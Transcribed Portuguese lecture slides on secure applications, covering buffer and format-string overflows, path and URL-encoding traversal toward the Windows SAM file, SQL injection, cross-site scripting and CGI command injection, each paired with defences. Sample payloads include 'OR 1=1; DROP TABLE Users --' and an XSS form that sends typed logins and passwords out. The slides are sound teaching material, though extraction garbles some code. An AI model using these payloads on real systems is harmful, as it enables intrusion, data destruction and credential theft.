Aplicações Seguras. Exemplos de vulnerabilidades comuns. Carlos Ribeiro Algoritmos e Aplicações de Segurança

Transcrição

1 Aplicações Seguras Exemplos de vulnerabilidades comuns 1

2 Exemplos de Vulnerabilidades Protocolos de autenticação mal desenhados. E.g. WEP, 802.1x (1º versão), PPTP, MS- CHAPv1. Protocolos de comunicação inseguros. E.g. Primeiras versões do openssl. Algoritmos de cifra inseguros. O número é tão grande quanto os critptólogos Utilização incorrecta dos sistemas. E.g. Gestão de senhas. Incumprimento da política de segurança. Incorrecta gestão dos mecanismos de autorização E.g. Ficheiros confidenciais não protegidos Incorrecto desenho e implementação das aplicações 2

3 Vulnerabilidades: Índice Probs. relacionados com composição Aplicações/Serviços Percepção errada do comportamento da outra Canais dissimulados Protocolos Overflows Stack Smashing Heap overflow BSS overflow Index overflow Format overflow Entrada de dados com base em NOMES SQL injection Cross-site scritping (XSS) 3

4 Problemas relacionados com a composição Aplicações/Serviços Percepção errada do comportamento da outra Canais dissimulados Protocolos 4

5 Composição: Percepção errada Um servidor de rlogin recebia pedidos de autenticação e passava-os para o programa de login local Acontece que num dos casos o programa de login aceitava logins préautenticados de programas em modo root, se estes lhe passassem a opção f username Se um utilizador pedisse ao rlogin para autenticar o utilizador -froot entrava directamente. Nenhum dos programas estava errado, só não sabiam muito bem o que é que o outro fazia. 5

6 Composição: Canais dissimulados Ficheiros.tar com partes do ficheiro de passwords. Todos os ficheiros.tar distribuídos continham partes do ficheiro de passwords O programa tar Obtinha informações do utilizador efectuando uma chamada ao sistema Criava blocos de 512K em memória e depois escrevia-os para disco. As informações do utilizador eram obtidas a partir do ficheiro passwd e escritas num buffer do heap, posteriormente libertado. Os blocos de memória utilizados pelo tar eram provenientes do heap O último bloco não era totalmente rescrito 6

7 Composição: Protocolos É a familia de protocolos para o estabelecimento de ligações de nível 2 num meio sem fios X É um protocolo criado para autenticar ligações de nível 2 numa rede cablada A conjunção dos dois deveria dar uma ligação sem fios, de nível 2, autenticada, mas... os protocolo de autenticação (802.1X) desconhece a particularidades do protocolo de ligação (802.11) A possível enviar uma mensagem não autenticada para desligar a ligação e roubá-la. 7

8 Overflows Stack Smashing Heap overflow BSS overflow Index overflow Format overflow 8

9 Overflows: Stack smashing Utilização normal Stack top z (char[12]) void f ( int x, char * y ) { char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) ); } prev frame pointer return address x (int) y (char*) f activation record (stack frame) Stack growth Stack bottom 9

10 Overflows: Stack smashing void f ( int x, char * y ) { char z[12]; sprintf (z, %d %s, x, y ); write ( 2, z, strlen(z) ); } { }... f ( 12345, grande demais ); g r a n d e prev frame d pointer e m areturn i address s \ grande demais Stack top buffer overflow!! Stack growth Stack bottom 10

11 Stack Smashing. Mas pouco!! push ebp mov ebp,esp void f ( char * y ) { sub esp,8 char z[8]; strncpy(z, y, sizeof(z)); z[sizeof(z)] = \0 ; printf( %s\n,z); return; mov esp,ebp } pop ebp ret Main() { f( grande demais ); return; mov esp,ebp } pop ebp ret g r a n d e d prev frame pointer \0 return address grande demais prev frame pointer return address false frame pointer false return address Stack top esp (f) ebp (f) ebp (main) ebp (truncado) Stack bottom 11

12 Heap/BSS overflow Heap Reservado dinamicamente char *buf1 = (char*)malloc(bufsize); BSS Variáveis não inicializadas char buf[bufsize]; 12

13 BSS/Heap overflow char buf[16]; char *tmpfile; int main(int argc, char **argv) { FILE *tmpfd; } tmpfile = "/tmp/vulprog.tmp"; printf("enter one line of data to put in %s: ", tmpfile); gets(buf); tmpfd = fopen(tmpfile, "w"); if (tmpfd == NULL) { fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno)); exit(-1); } fputs(buf, tmpfd); fclose(tmpfd); Qual é o problema? Vai escrever por cima do pointeiro tmpfile Se fizermos tmpfile:=*argv[1] e argv[1]:= /etc/passwd Pode escrever para além dos limites do buffer. 13

14 BSS/Heap char buf[16]; int(*funcptr)(constchar *str); int main(int argc, char **argv) { Argv[1] := 16*A &system Argv[2] := /bin/sh Argv[1] := 16*A &argv[2] Argv[2] := shellcode Necessita de pilha executável funcptr = (int (*)(const char *str))goodfunc; memset(buf, 0, sizeof(buf)); strncpy(buf, argv[1], strlen(argv[1])); } (void)(*funcptr)(argv[2]); return 0; Argv[1] := shellcode &buf Necessita de heap executável 14

15 Arrays void insertint(unsigned long index, unsigned long value) { intvector[index] = value; } Main() { intvector = (int*)malloc(sizeof(int)*0xffff); index = atol(argv[1]); value = atol(argv[2]); insertint(index, value); } Pode escrever em qualquer parte da memória inclusivamente por cima de um endereço de retorno na pilha. Para escrever em endereços menores que a base é apenas necessário efectuar cálculo modular 15

16 Strings de formatação int main() { int bytes_formatted=0; char buffer[28]= ABCDEFGHIJKLMNOPQRSTUVWXYZ ; printf( %.20x%n,buffer,&bytes_formatted); printf( \nnumero de Bytes formatados: %d\n,bytes_formatted); } intmain(intargc, char *argv[]) { char buffer[512]=""; strncpy(buffer,argv[1],500); printf(buffer); } Argv[1] = shellcode %x%x%x%x%.numx%n retposition Num = &argv[1]-size(shellcode)-size(%x%x%x%x) 16

17 Entradas saídas com base em NOMES SQL injection Cross-site scritping (XSS) 17

18 baseada em nomes Nomes de quê? Ficheiros (nome e extensão) URLs Servidores (DNS) Utilizadores Muitas formas alternativas de representação de nomes. Se a validação desses nomes não for correctamente efectuada a segurança falha. 18

19 baseada em nomes: Então tudo se resume à correcção Pensamentos a evitar: O meu código não tem erros ; Nós já verificámos todas as entradas de dados ; Esse ataque é muito difícil, ninguém se vai dar ao trabalho ; Nós não temos esse problema: nós usamos... Cifra; firewalls; etc. Etc. Errar é humano (sabemos mas esquecemos frequentemente). 19

20 baseada em nomes de ficheiros Windows c:\winnt\repair\sam c:\winnt\repair\sam c:\winnt\repair\sam. c:\winnt\..\winnt\repair\sam \\?\c:\winnt\repair\sam c:\winnt\repair\sam::$data \\servername\c$\winnt\repair\sam \\?\UNC\servername\c$\winnt\repair \sam c:\program files\com1 20

21 baseada em nomes de URLs Todos as representações dos ficheiros (ASCII)../winnt/repair/sam (Escaped) %2e%2e/winnt/repair/sam (UTF-8) %c0%ae%c0%ae/winnt/repair/sam (UCS-2) %u002e%u002e/winnt/repair/sam (UCS2 fullwidth) %uff0e%uff0e/winnt/repair/sam (Double encoding) %252e%252e/winnt/repair/sam 21

22 baseada em nomes de Servidores & Utilizadores Servidores ribeiro ribeiro.tagus.ist.utl.pt \\ribeiro localhost \\localhost ou 127.x.x.x Utilizadores carlos ribeiro\carlos 22

23 baseada em nomes: O que fazer? Estar alerta para o problema. Não efectuar validações de segurança com base no nome ou extensão de ficheiros ou urls. Sempre que possível reduzir os nomes à forma canónica. Aceitar o válido rejeitar tudo o resto. 23

24 baseada em nomes: O cliente Os clientes também baseiam a segurança em nomes Os URLs são um caso típico Os URLs podem ser manipulados Envenenando as caches do DNS No futuro utilizando nomes visualmente iguais mas com códigos diferentes e 24

25 SQL Injection: O ataque clássico SQLQuery = SELECT Username FROM Users WHERE Username = & strusername & AND Password = & strpassword & strauthcheck = getqueryresult(sqlquery) If strauthcheck = Then bauthenticated = False Else bauthenticated = True End If Login: admin OR 1=1 Password: OR 1=1 SELECT Username FROM Users WHERE Username = admin OR 1=1 AND Password = OR 1=1 Login: OR 1=1 ; DROP TABLE Users -- Password: nao interessa SELECT Username FROM Users WHERE Username = OR 1=1 ; DROP TABLE Users -- 25

26 SQL Injection: Stored Procedures SQLQuery= EXEC sp_authenticate & Username &, Password strauthcheck = getqueryresult(sqlquery) Login: admin OR 1=1 -- Password: Falha!! EXEC sp_authenticate admin, OR 1=1 Login: admin, ; DROP TABLE Users -- Password: nao interessa Ok!! EXEC sp_authenticate admin, ; DROP TABLE Users -- 26

27 SQL Injection: O que fazer? Nem sempre os ataques são tão simples: Por vezes as queries são tão complexas que se torna difícil explorá-las. Mas... A solução é evitar o parsing das entradas pelo parser de SQL... Set cmd = CreateObject( ADOBD.Command ) cmd.command = select Username from Users where Username=? and Password=? Set parm1 = cmd.createparameter(...) parm1.value = strusername cmd.parameter.append parm1 Set parm2 = cmd.createparameter(...) parm2.value = strpassword cmd.parameter.append parm2 Set strauthcheck = cmd.execute... 27

28 Cross-site scripting (XSS) Site com a falha Servidor WWW Site atacante HTTP envenenado HTTP de ataque Cliente Atacado HTTP Servidor WWW Browser 28

29 Cross-site scripting (XSS) Site com a falha Servidor WWW <HTML> 404 page does not exist: FILENAME.html... </HTML> Cliente Atacado Browser 29

30 Cross-site scripting (XSS) Cliente Atacado O meu banco Servidor WWW Login: XPTO <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login XPTO <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password >... 30

31 Cross-site scripting (XSS) Se em vez do username for introduzido: Bank Login: </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http// + document.forms(1).login.value + : + document.forms(1).password.value; > <FORM ACTION= login1.asp METHOD= post > <CENTER>Bad Login </form> <form action= login1.asp method= post onsubmit= XSSimage = new image; XSSimage.src= http// + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE= text NAME= login > <br>password:<br><input TYPE= password NAME= password > 31

32 Cross-site scripting (XSS) O atacante só tem que convencer o cliente atacado a clicar num link com o seguinte aspecto: %3Cform%20action=%22login1.asp%22%20method=%22p ost%22%20onsubmit=%22xssimage=new%20image;xssi mage.src= http// %20%2B%20document. forms(1).login.value%20%2b%20 : %20%2B%20documen t.forms(1).password.value;%22%3e 32

33 Cross-site scripting (XSS) O problema não é dos servidores Os clientes também têm ficheiros html File://c:/mydocuments/falha.html Browsers executam script locais sem perguntar Então o que fazer? 33

34 Cross-site scripting (XSS): Soluções Codificar as saídas Substituir símbolos interpretados pelo HTML Ex.: < é substituído por &lt Reduzir o número de símbolos HTML a um mínimo Testar o admitido (não testar o não aceite) Não reinventar a roda Se já existe bem feito reusem 34

35 Exemplo: CGI em C Static char cmd[128]; Static char format[] = grep %s phone.list\n ; Stack Overflow: Escreve por cima do endereço de retorno Int main(int argc, char *argv[]) { char buf[256]; gets(buf); sprintf(cmd, format, buf+5); syslog(36,cmd); write(1, Content-Type: text/plain\n\n 27); system(cmd); } Static buffer Overflow: Escreve por cima do format Validação de entrada: buf =. /etc/passwd Validação de entrada: cmd = carlos phone.list\n \tinocêncio\t\ \t00:02:00 word secreto.doc\n \tcarlos\t\ \t00:05:00grep Zé Logfile carlos :01:31 grep carlos phone.list inocêncio :02:00 word secreto.doc carlos :05:00 grep Zé phone.list 35

36 O que fazer? Pensar a segurança em todas as fases do projecto: Arquitectura Desenho Implementação Operação Efectuar a verificação por terceiros, quer do desenho quer da implementação. Utilizar ferramentas para: Detecção de erros comuns Protecção contra erros comuns Wrappers Compiladores especiais Conhecer os erros comuns. 36

37 Que entradas proteger? As de dados inseridos por humanos As de dados inseridos por aplicações/serviços Não assumir que a informação não é inserida por scripts automáticos. Não assumir que os dados vindos de outras aplicações estão sintaticamente correctos. Não assumir que ninguém vai detectar esse problema. Por ofuscação; Por falta de especialização. As de dados provenientes de ficheiros de configuração. Problemas de corridas entre verificação e utilização. Utilização de links nos sistemas de ficheiros. As de dados produzidos pelo próprio programa (defesa em profundidade) Entradas de dados implícitas 37